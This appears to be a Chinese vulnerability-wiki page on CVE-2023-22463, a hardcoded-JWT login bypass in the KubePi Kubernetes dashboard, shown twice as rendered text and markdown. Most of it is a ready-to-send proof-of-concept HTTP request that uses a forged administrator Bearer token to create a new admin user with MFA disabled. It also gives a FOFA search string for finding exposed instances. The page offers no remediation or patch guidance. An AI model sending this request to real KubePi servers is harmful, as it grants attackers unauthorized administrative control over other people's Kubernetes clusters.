fofamini-wiki

登录白背景

源码

KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463

漏洞描述

KubePi 是一个现代化的 K8s 面板。KubePi 允许管理员导入多个 Kubernetes 集群，并且通过权限控制，将不同 cluster、namespace 的权限分配给指定用户。它允许开发人员管理 Kubernetes 集群中运行的应用程序并对其进行故障排查，供开发人员更好地处理 Kubernetes 集群中的复杂性。

KubePi 中存在 JWT硬编码，攻击者通过硬编码可以获取服务器后台管理权限，添加任意用户。

漏洞影响

KubePi

网络测绘

"kubepi"

漏洞复现

登陆页面

验证POC

POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
       "password": "{{randstr}}"
  },
  "email": "{{randstr}}@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "{{randstr}}",
  "nickName": "{{randstr}}",
  "roles": [
       "Supper User"
  ]
}

# KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463

## 漏洞描述

KubePi 中存在 JWT硬编码，攻击者通过硬编码可以获取服务器后台管理权限，添加任意用户。

## 漏洞影响

KubePi

## 网络测绘

```
"kubepi"
```

## 漏洞复现

登陆页面

![image-20230828145208969](images/image-20230828145208969.png)

验证POC

```
POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
       "password": "{{randstr}}"
  },
  "email": "{{randstr}}@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "{{randstr}}",
  "nickName": "{{randstr}}",
  "roles": [
       "Supper User"
  ]
}
```

![image-20230828145242203](images/image-20230828145242203.png)